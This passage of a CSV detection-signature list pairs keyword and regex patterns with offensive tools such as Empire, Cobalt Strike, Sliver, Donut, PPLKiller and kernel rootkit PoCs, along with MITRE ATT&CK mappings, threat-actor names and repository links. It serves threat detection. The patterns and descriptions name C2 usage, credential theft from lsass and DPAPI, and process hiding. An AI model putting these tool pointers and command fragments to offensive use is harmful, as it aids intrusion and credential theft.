TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ProcessHerpaderpingTemplate*",".{0,1000}ProcessHerpaderpingTemplate.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*processhider.c*",".{0,1000}processhider\.c.{0,1000}","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","695","162","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*-ProcessID * -Dll * -Module *",".{0,1000}\-ProcessID\s.{0,1000}\s\-Dll\s.{0,1000}\s\-Module\s.{0,1000}","offensive_tool_keyword","empire","empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*processImplantMessage*",".{0,1000}processImplantMessage.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*process-inject *",".{0,1000}process\-inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*processinject_min_alloc*",".{0,1000}processinject_min_alloc.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*ProcessManager.exe --machine *",".{0,1000}ProcessManager\.exe\s\-\-machine\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*ProcessManager.exe --name explorer*",".{0,1000}ProcessManager\.exe\s\-\-name\sexplorer.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*processPIDByName*lsass.exe*",".{0,1000}processPIDByName.{0,1000}lsass\.exe.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*ProcessPPKFile*",".{0,1000}ProcessPPKFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessPuTTYLocal*",".{0,1000}ProcessPuTTYLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessRDPFile*",".{0,1000}ProcessRDPFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessRDPLocal*",".{0,1000}ProcessRDPLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessSuperPuTTYFile*",".{0,1000}ProcessSuperPuTTYFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Process-TaskingPackets*",".{0,1000}Process\-TaskingPackets.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessThoroughLocal*",".{0,1000}ProcessThoroughLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessThoroughRemote*",".{0,1000}ProcessThoroughRemote.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Processus-Thief/HEKATOMB*",".{0,1000}Processus\-Thief\/HEKATOMB.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*ProcessWinSCPLocal*",".{0,1000}ProcessWinSCPLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcHideClient.exe -*",".{0,1000}ProcHideClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" 
"*ProcHideDrv_x64.sys*",".{0,1000}ProcHideDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*ProcProtectClient.exe *",".{0,1000}ProcProtectClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*produkey.zip*",".{0,1000}produkey\.zip.{0,1000}","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*produkey_setup.exe*",".{0,1000}produkey_setup\.exe.{0,1000}","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. 
and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*produkey-x64.zip*",".{0,1000}produkey\-x64\.zip.{0,1000}","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*profiles generate --save *",".{0,1000}profiles\sgenerate\s\-\-save\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*profiles new beacon *",".{0,1000}profiles\snew\sbeacon\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*profiles new --mtls *",".{0,1000}profiles\snew\s\-\-mtls\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
